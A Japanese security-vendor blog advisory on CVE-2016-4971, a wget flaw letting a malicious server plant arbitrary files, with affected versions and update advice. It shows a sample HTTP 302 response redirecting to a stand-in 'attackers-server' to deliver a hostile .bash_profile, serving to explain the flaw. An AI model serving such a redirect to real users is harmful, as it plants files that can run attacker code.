wgetに任意のファイルを書き込むことが可能になる脆弱性(CVE-2016-4971) — | サイオスOSS | サイオステクノロジー

wgetに任意のファイルを書き込むことが可能になる脆弱性(CVE-2016-4971)

6月9日にwget-1.8がリリースされました。7/6にdebian/ubuntuの方も対応が完了していますので、今回はこの脆弱性についてまとめてみます。

こんにちは。SIOS OSSエバンジェリスト/セキュリティ担当の面です。

少し古い情報ですが、6月9日にwget-1.8がリリースされました。7/6にdebian/ubuntuの方も対応が完了していますので、今回はこの脆弱性についてまとめてみます。


関連するCVE

CVE-2016-4971

Priority

High

影響するバージョン

wget-1.18未満のバージョン

CVE概要(詳細はCVEのサイトをご確認ください)

  • CVE-2016-4971
      • wgetにより任意のファイルに書き込まれる可能>性

      • 重要度 – High

    1. wgetの制御が不十分なため、wgetでファイルをダウンロードしようとした際に、攻撃者が接続対象のサーバを攻撃して下記のような不正なレスポンスを返した際には

      HTTP/1.1 302 Found
      Cache-Control: private
      Content-Type: text/html; charset=UTF-8
      Location: ftp://attackers-server/.bash_profile
      Content-Length: 262
      Server: Apache
      

      wgetが自動的にattackers-serverにリダイレクトされ、.bash_profileファイルを悪意のあるFTPサーバからダウンロードしてしまうことになります。

      これを利用して、攻撃者はwgetで接続してきたユーザのPC上に任意のファイルを書き込むことが可能になります。


    2. 主なディストリビューションの対応方法

      詳細は、各ディストリビューションの提供元にご確認ください


    対処方法

    各ディストリビューションの案内に従い、アップデートを行ってください。全てのRed Hat製品でパッチが行き渡っているかを確認するには、Red Hat Satelliteを使うと管理が便利でしょう。


    [参考]

    [セミナー告知]

    7/22にノベル株式会社様と共催で「クラウド・OSSセキュリティセミナー」と題して、OpenStack基盤自体のセキュリティに関して、デモを交えたセミナーを行います。

    https://sios.secure.force.com/webform/SeminarDetail?id=70110000000sotpAAAがプログラム内容と申し込みの

    詳細になりますので、是非お申し込み下さい。

    —–

    タイトルとURLをコピーしました